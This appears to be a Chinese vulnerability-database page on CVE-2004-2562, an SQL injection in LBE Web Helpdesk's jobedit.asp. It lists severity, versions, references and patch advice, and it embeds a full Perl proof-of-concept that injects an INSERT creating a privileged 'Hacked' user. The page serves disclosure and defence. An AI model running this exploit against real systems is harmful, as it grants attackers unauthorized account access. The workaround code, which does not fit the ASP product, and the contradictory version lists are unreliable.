CVE-2004-2562
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:29
NMCOES    

[原文]SQL injection vulnerability in jobedit.asp in Leigh Business Enterprises (LBE) Web Helpdesk before 4.0.0.81 allows remote attackers to execute arbitrary SQL commands via the id parameter.


[CNNVD]Leigh Business Enterprises Web HelpDesk SQL注入漏洞(CNNVD-200412-680)

        
        LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。
        LBE Web Helpdesk不正确过滤用户提交的数据,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感数据或修改数据库。
        问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤,提交包含恶意SQL命令的数据作为'id'参数,可修改'users'表,增加操作员相等权限的新用户。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.65
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.41_2001-08-27
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.61
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.67
cpe:/a:leigh_business_enterprises:web_helpdesk:1.3_2000-07-00
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.62
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.78
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.54
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.60
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.33_2001-05-00
cpe:/a:leigh_business_enterprises:web_helpdesk:1.4_2000-08-00
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.52
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.63
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.69
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.79
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.75
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.35_2001-06-04
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.71
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.73
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.53
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.76
cpe:/a:leigh_business_enterprises:web_helpdesk:1.2_1999-07-00
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.74
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.43_2001-09-28
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.40_2001-07-21
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.64
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.77
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.80
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.59
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.72
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.50
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0_2001-03-00
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.38_2001-06-10
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.70
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.66
cpe:/a:leigh_business_enterprises:web_helpdesk:4.0.0.68

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2562
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2562
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-680
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10773
(PATCH)  BID  10773
http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
(PATCH)  MISC  http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
http://secunia.com/advisories/12123
(VENDOR_ADVISORY)  SECUNIA  12123
http://xforce.iss.net/xforce/xfdb/16779
(UNKNOWN)  XF  webhelpdesk-jobedit-sql-injection(16779)
http://www.osvdb.org/8181
(UNKNOWN)  OSVDB  8181
http://www.lbehelpdesk.com/patch/web/history.txt
(UNKNOWN)  CONFIRM  http://www.lbehelpdesk.com/patch/web/history.txt

- 漏洞信息

Leigh Business Enterprises Web HelpDesk SQL注入漏洞
高危 输入验证
2004-12-31 00:00:00 2006-01-24 00:00:00
远程  
        
        LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。
        LBE Web Helpdesk不正确过滤用户提交的数据,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感数据或修改数据库。
        问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤,提交包含恶意SQL命令的数据作为'id'参数,可修改'users'表,增加操作员相等权限的新用户。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在$nick = htmlspecialchars($nick);前插入if ($cadena_final) { unset($cadena_final); }代码。
        厂商补丁:
        Leigh Business Enterprises
        --------------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Leigh Business Enterprises Web HelpDesk 4.0 .0.80:
        Leigh Business Enterprises Upgrade weblatest.zip
        
        http://www.lbehelpdesk.com/patch/web/weblatest.zip

- 漏洞信息 (24300)

Leigh Business Enterprises Web HelpDesk 4.0 SQL Injection Vulnerability (EDBID:24300)
asp webapps
2004-07-21 Verified
0 Noam Rathaus
N/A [点击下载]
source: http://www.securityfocus.com/bid/10773/info

LBE Web HelpDesk is reported susceptible to an SQL injection vulnerability. This issue is due to improper sanitization of user-supplied data.

This issue may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

Versions 4.0.0.80 and prior are reported vulnerable to this issue.

#!/usr/bin/perl

use IO::Socket;
use strict;

my $host = $ARGV[0];
my $Path = $ARGV[1];
my $Email = $ARGV[2];
my $Password = $ARGV[3];

if (($#ARGV+1) < 4)
{
 print "lbehelpdesk.pl host path email password\n";
 exit(0);
}

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Getting default cookie\n";

my $http = "GET /$Path/oplogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close

";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $Cookie = "";

while (<$remote>)
{
 if (/Set-Cookie: ([^;]+;)/)
 {
  $Cookie .= $1." ";
 }

# print $_;
}
print "\n";

close($remote);

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Logging in\n";

$remote->autoflush(1);

my $http = "POST /$Path/gstlogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = "txtemail=$Email&txtpwd=$Password";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $success = 0;
while (<$remote>)
{
 if (/Location: eval.asp/)
 {
  $success = 1;
  print "Login successfull\n";
 }

# print $_;
}
print "\n";

close $remote;

if (!$success)
{
 print "Login failed\n";
 exit(0);
}

$http = "GET /$Path/jobedit.asp?id=0%20;%20INSERT%20INTO%20users%20(%20user_name,".
"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate,".
"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs,".
"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked',".
"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201,".
"%201,%201) HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie

";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

while (<$remote>)
{
 if (/Unable to find Job id = 0 ; INSERT INTO users/g)
 {
  print "Successfully added record\nYou can now log on as Hacked/password (Username/Password)\n";
 }
# print $_;
}

close($remote);

# INSERT INTO users ( user_name, password, editactiontime, orgstructure, createviewtemplate, removelogins, editlinkedfiles, newencrypt, showalljobs, publishmacros, override_contract ) VALUES ('Hacked', '60716363677F6274', 1, 1, 1, 1, 1, 'Y', 1, 1, 1) # Password is 'password'
		

- 漏洞信息

8181
LBE Web HelpDesk jobedit.asp id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

LBE Web HelpDesk contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the 'id' parameter within jobedit.asp is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-07-22 Unknow
2004-07-22 Unknow

- 解决方案

Upgrade to version 4.0.0.81 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Leigh Business Enterprises Web HelpDesk SQL Injection Vulnerability
Input Validation Error 10773
Yes No
2004-07-21 12:00:00 2009-07-12 06:16:00
Noam Rathaus <expert@securiteam.com> disclosed this vulnerability.

- 受影响的程序版本

Leigh Business Enterprises Web HelpDesk 4.0 .0.80
Leigh Business Enterprises Web HelpDesk 4.0 .0.81

- 不受影响的程序版本

Leigh Business Enterprises Web HelpDesk 4.0 .0.81

- 漏洞讨论

LBE Web HelpDesk is reported susceptible to an SQL injection vulnerability. This issue is due to improper sanitization of user-supplied data.

This issue may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

Versions 4.0.0.80 and prior are reported vulnerable to this issue.

- 漏洞利用

An exploit is not required, but a proof-of-concept script has been provided.

- 解决方案

The vendor has released version 4.0.0.81 addressing this issue.


Leigh Business Enterprises Web HelpDesk 4.0 .0.80

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站